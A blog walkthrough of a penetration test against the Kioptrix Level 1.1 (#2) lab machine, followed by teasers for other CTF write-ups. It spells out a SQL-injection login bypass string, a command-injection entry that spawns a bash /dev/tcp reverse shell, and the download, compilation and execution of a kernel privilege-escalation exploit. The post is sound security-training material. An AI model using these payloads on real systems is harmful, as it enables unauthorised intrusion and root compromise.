Kioprix: Level 1.1(#2)

Lab Environment

Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

Vulnerable Machine : Kioptrix: level 1.1(#2)

Let’s start hacking and breach the security of this machine 

Scanning Phase :

Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
      Syntax used : arp-scan -l
                  Victim machine: 192.168.113.130


Enumeration Phase :

I used Nmap for further enumeration of ports and it’s services.
Syntax Used: nmap 192.168.113.130 -Pn 


I found HTTP service on port 80. So, I tried to visit the webpage if I can get something useful.
Boom !!
Found Login Page.

Authentication Bypass should be the first approach to bypass login page.
Query Used: 1’or’1’=’1 (Query used in Username and Password field)

With this got an entry in the panel and prompted with a page asking to ping a machine on the network.
To test this I provided my IP to know the things more clearly.

Got reply and ping statistics 


Gaining Access:

What did I think after the reply?
That there could be a OS Command Injection Vulnerability and so I injected one-liner for netcat 
To gain the reverse shell.
One-Liner: bash -i>& /dev/tcp/attacker’s IP/port 0>&1 
Simultaneously Fired netcat to get reverse connection on port 4444


Got shell !!!! 
It’s time to enumerate the machine to become root 
I found the kernel version to exploit the machine 
Syntax Used: uname -a 


All credit to exploit-db.com 
Found Privilege escalation exploit on exploit-db 


Downloaded the exploit on my attacking machine by using wget utility.
Then I made a simple python server to transfer exploit from attacking machine to victim machine 
Syntax Used: python -m SimpleHTTPServer 1337


I changed my directory to tmp in reverse shell which I gained with Netcat and downloaded the exploit using wget.
Syntax used: cd /tmp
Downloading exploit from my attacking machine to victim machine 
OR
We can directly download to victim machine using wget.

Now, it’s time to compile the file of exploit.
Changing the name of a file from 9542 to paras.c
Syntax used: mv 9542 paras.c
Then compiling paras.c with gcc compiler.
Syntax used: gcc paras.c
We got a.out file 


Executing a.out 
Syntax used: ./a.out 

Finally got root !!!!











Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more